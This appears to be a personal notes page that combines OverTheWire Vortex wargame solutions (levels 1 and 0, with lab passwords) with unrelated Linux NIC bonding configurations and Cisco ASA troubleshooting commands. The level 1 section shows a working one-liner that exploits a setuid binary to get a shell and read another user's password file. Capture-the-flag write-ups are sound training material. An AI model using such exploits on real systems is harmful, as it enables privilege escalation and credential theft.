# Vortex wargame: Level 1


# ssh vortex1@vortex.labs.overthewire.org
vortex1@vortex.labs.overthewire.org's password:477123717533624633

$ file /vortex/vortex1
/vortex/vortex1: setuid ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked (uses shared libs), for GNU/Linux 2.6.15, not stripped
$ (for i in `seq 1 10`; do perl -e 'print "\x5c"x89000000'; done; perl -e 'print "\x21"'; cat) | /vortex/vortex1
/usr/bin/whoami
vortex2
/bin/cat /etc/vortex_pass/vortex2
3233616e62545c7245

# Vortex wargame: Level 0


# cat v0.c
#include <netdb.h>
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <unistd.h>

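/*
 * Read exactly len bytes from fd into buf.
 * recv() on a stream socket may return fewer bytes than requested, so keep
 * reading until the buffer is full.
 * Returns 0 on success, -1 on a socket error or if the peer closes early.
 */
static int recv_all(int fd,void *buf,size_t len){
 char *p=buf;
 while(len>0){
  ssize_t n=recv(fd,p,len,0);
  if(n<=0)
   return -1;
  p+=n;
  len-=(size_t)n;
 }
 return 0;
}

/*
 * Client for the level 0 service: connect to argv[1]:argv[2], read four
 * ints, print them, send their sum back and print whatever the server
 * answers (the credentials line).
 *
 * Returns 0 on success and 1 on a usage, resolution, connection or I/O error.
 */
int main(int argc,char *argv[]){
 int sfd,s,i;
 int uint[4];
 unsigned int result;
 ssize_t n;
 char credentials[64];
 struct addrinfo server_hints;
 struct addrinfo *server_result,*rp;

 /* argv[1] and argv[2] are dereferenced below; refuse to run without them. */
 if(argc!=3){
  fprintf(stderr,"usage: %s host port\n",argc>0?argv[0]:"v0");
  return 1;
 }

 memset(&server_hints,0,sizeof(struct addrinfo));
 server_hints.ai_family=AF_UNSPEC;
 server_hints.ai_socktype=SOCK_STREAM;
 server_hints.ai_protocol=0;

 /* On failure server_result is not valid, so it must not be dereferenced. */
 s=getaddrinfo(argv[1],argv[2],&server_hints,&server_result);
 if(s!=0){
  fprintf(stderr,"getaddrinfo: %s\n",gai_strerror(s));
  return 1;
 }

 /* Try each returned address until one accepts the connection. */
 sfd=-1;
 for(rp=server_result;rp!=NULL;rp=rp->ai_next){
  sfd=socket(rp->ai_family,rp->ai_socktype,rp->ai_protocol);
  if(sfd==-1)
   continue;
  if(connect(sfd,rp->ai_addr,rp->ai_addrlen)!=-1)
   break;
  close(sfd);
  sfd=-1;
 }
 /* The list is released on every path, not only after a successful connect. */
 freeaddrinfo(server_result);
 if(sfd==-1){
  fprintf(stderr,"could not connect\n");
  return 1;
 }

 result=0;
 for(i=0;i<4;i++){
  if(recv_all(sfd,&uint[i],sizeof(uint[i]))==-1){
   fprintf(stderr,"short read from server\n");
   close(sfd);
   return 1;
  }
  printf("uint[%d] = %d\n",i,uint[i]);
  /* Sum as unsigned: wraps modulo 2^32 instead of signed-overflow UB. */
  result+=(unsigned int)uint[i];
 }

 /* The sum goes back in the same in-memory representation it arrived in. */
 if(send(sfd,&result,sizeof(result),0)!=(ssize_t)sizeof(result)){
  fprintf(stderr,"send failed\n");
  close(sfd);
  return 1;
 }

 /*
  * Leave the last byte untouched so the buffer stays NUL-terminated even
  * when the server sends sizeof(credentials) bytes or more; printf("%s")
  * would otherwise read past the end of the array.
  */
 memset(credentials,0,sizeof(credentials));
 n=recv(sfd,credentials,sizeof(credentials)-1,0);
 if(n<0){
  fprintf(stderr,"recv failed\n");
  close(sfd);
  return 1;
 }
 printf("%s\n",credentials);
 close(sfd);
 return 0;
}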
# gcc -o v0 v0.c
# ./v0 vortex.labs.overthewire.org 5842
uint[0] = 1643010444
uint[1] = 1050412351
uint[2] = 559062867
uint[3] = 556524630
Username: vortex1 Password: 477123717533624633

# Linux ethernet bonding configuration


Software

# apt-get install ifenslave-2.6
# modprobe bonding
Bonding modes and switch configuration dependency

mode 0 (rr): etherchannel mode on
mode 1 (a-b): access port
mode 2 (xor): etherchannel mode on
mode 3 (broadcast): ¿?
mode 4 (LACP): etherchannel mode active
mode 5 (TLB): access port
mode 6 (ALB): access port

Balance-xor or mode 2

# cat /etc/network/interfaces
auto eth1
iface eth1 inet manual
 bond-master bond0

auto eth2
iface eth2 inet manual
 bond-master bond0

auto eth3
iface eth3 inet manual
 bond-master bond0

auto eth4
iface eth4 inet manual
 bond-master bond0

auto bond0
iface bond0 inet static
 address 192.168.5.69
 netmask 255.255.255.0
 network 192.168.5.0
 broadcast 192.168.5.255
 gateway 192.168.5.254
 dns-nameservers 192.168.125.100
 bond-slaves none
 bond-mode 2
 bond-miimon 100
 bond-use_carrier 1
 bond-downdelay 200
 bond-updelay 200
 bond-lacp-rate 0
 bond-xmit_hash_policy layer3+4
Switch(config)# port-channel load-balance src-dst-port
Switch(config)# interface range fa0/1-4
Switch(config-if-range)# channel-group 1 mode on
802.3ad or mode 4 (LACP)

# cat /etc/network/interfaces
auto eth1
iface eth1 inet manual
 bond-master bond0

auto eth2
iface eth2 inet manual
 bond-master bond0

auto eth3
iface eth3 inet manual
 bond-master bond0

auto eth4
iface eth4 inet manual
 bond-master bond0

auto bond0
iface bond0 inet static
 address 192.168.5.69
 netmask 255.255.255.0
 network 192.168.5.0
 broadcast 192.168.5.255
 gateway 192.168.5.254
 dns-nameservers 192.168.125.100
 bond-slaves none
 bond-mode 4
 bond-miimon 100
 bond-use_carrier 1
 bond-downdelay 200
 bond-updelay 200
 bond-lacp-rate 0
 # layer3+4 is not fully 802.3ad compliant (interfaces(5) does not support end-of-line comments, so this note is on its own line)
 bond-xmit_hash_policy layer2+3
Switch(config)# port-channel load-balance src-dst-ip
Switch(config)# interface range fa0/1-4
Switch(config-if-range)# channel-group 1 mode active
Balance-tlb or mode 5 (Adaptive transmit load balancing)

# cat /etc/network/interfaces
auto eth1
iface eth1 inet manual
 bond-master bond0

auto eth2
iface eth2 inet manual
 bond-master bond0

auto eth3
iface eth3 inet manual
 bond-master bond0

auto eth4
iface eth4 inet manual
 bond-master bond0

auto bond0
iface bond0 inet static
 address 192.168.5.69
 netmask 255.255.255.0
 network 192.168.5.0
 broadcast 192.168.5.255
 gateway 192.168.5.254
 dns-nameservers 192.168.125.100
 bond-slaves none
 bond-mode 5
 bond-miimon 100
 bond-use_carrier 1
 bond-downdelay 200
 bond-updelay 35000
- No switch configuration needed.
- For each slave interface, the host sends three LLC frames per second, each 60 bytes long.
- Each frame uses the MAC of the slave interface as source and destination address.
- The IP packets do not update the ARP table.
- From the host's view, packets are transmitted on every slave interface but received on only one.
- Traffic received is influenced by sending ARP requests to hosts in the same VLAN.

Balance-alb or mode 6 (Adaptive load balancing)

# cat /etc/network/interfaces
auto eth1
iface eth1 inet manual
 bond-master bond0

auto eth2
iface eth2 inet manual
 bond-master bond0

auto eth3
iface eth3 inet manual
 bond-master bond0

auto eth4
iface eth4 inet manual
 bond-master bond0

auto bond0
iface bond0 inet static
 address 192.168.5.69
 netmask 255.255.255.0
 network 192.168.5.0
 broadcast 192.168.5.255
 gateway 192.168.5.254
 dns-nameservers 192.168.125.100
 bond-slaves none
 bond-mode 6
 bond-miimon 100
 bond-use_carrier 1
 bond-downdelay 200
 bond-updelay 35000
- No switch configuration needed.
- For each slave interface, the host sends three LLC frames per second, each 60 bytes long.
- Each frame uses the MAC of the slave interface as source and destination address.
- The IP packets do not update the ARP table.
- From the host's view, packets are transmitted and received on every slave interface.
- Traffic received is influenced by sending ARP requests to hosts in the same VLAN.

Reference

https://www.kernel.org/doc/Documentation/networking/bonding.txt

# ASA troubleshooting commands


Resource use

# show cpu usage detailed
# show memory
# show blocks
Hardware and license information

# show version
# show module all
# show mode
Connections and translations

# show conn
! idle == no packets received for the last x seconds
# show perfmon
# show nat
! idle == last conn created was x seconds ago 
! i-dynamic.timeout == will begin when the last conn is removed (3 hours)
! r-portmap.timeout == will begin when the last conn is removed (30 seconds)
! s-static.timeout == none (static entries do not time out)
# show xlate
# show local-host
Drops

# show service-policy
# show asp drop
# show logging
High availability

# show failover
Interface information

# show ip
# show nameif
# show traffic
Debug

# terminal monitor ! SSH sessions
# debug icmp trace
# debug arp
# debug esmtp
# debug http
Logging

(config)# logging enable
(config)# logging timestamp
(config)# logging buffered debugging
(config)# logging buffer-size 65000
# show logging
Packet capture

(config)# access-list capture_acl extended permit ip host 1.1.1.1 host 2.2.2.2
(config)# access-list capture_acl extended permit ip host 2.2.2.2 host 1.1.1.1
# capture capture_name interface interface_name access-list capture_acl
# clear capture capture_name
# show capture capture_name
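! wget -O capture_name.pcap --user=asa_user --password=asa_password https://asa_ip/capture/capture_name/pcap
! (--password on the command line is visible in the process list and shell history; wget --ask-password prompts for it instead)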
# no capture capture_name
Packet tracer

# packet-tracer input interface_name tcp 1.1.1.1 1234 2.2.2.2 5678
VPN

# show crypto isakmp sa
# show crypto ipsec sa